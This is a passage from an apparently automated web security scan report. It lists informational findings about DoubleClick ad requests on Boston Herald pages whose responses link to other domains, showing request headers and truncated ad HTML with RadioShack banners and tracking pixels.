82122&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=3382122&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.34. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2145795389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:47:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5228

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
27951&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=8127951&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.35. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:22:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5016

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;39969205&migRandom=7819559&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://radioshack.lenmar.com/RS/"><img src="http://s0.2mdn.net/2782903/Q1_Battery_Cont300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;39969205&migRandom=7819559&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205"></script>
...[SNIP]...

17.36. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=670623313? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:19:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5219

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
68779&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=2868779&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

17.37. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2119796835? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 03:09:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5222

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
92390&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=1092390&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

17.38. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=636403816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:14:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5219

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
28278&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=7328278&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

17.39. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:03:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5222

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
87560&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=1887560&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

17.40. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5215

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
10980&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=7510980&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

17.41. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:01:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5215

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
88231&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=6588231&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

17.42. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1819507567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:15:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5222

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
23045&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=2623045&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

17.43. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:06:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5008

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;39969225&migRandom=5658295&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://radioshack.lenmar.com/RS/"><img src="http://s0.2mdn.net/2782903/Q1_Battery_Cont728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;39969225&migRandom=5658295&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=39969225"></script>
...[SNIP]...

17.44. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
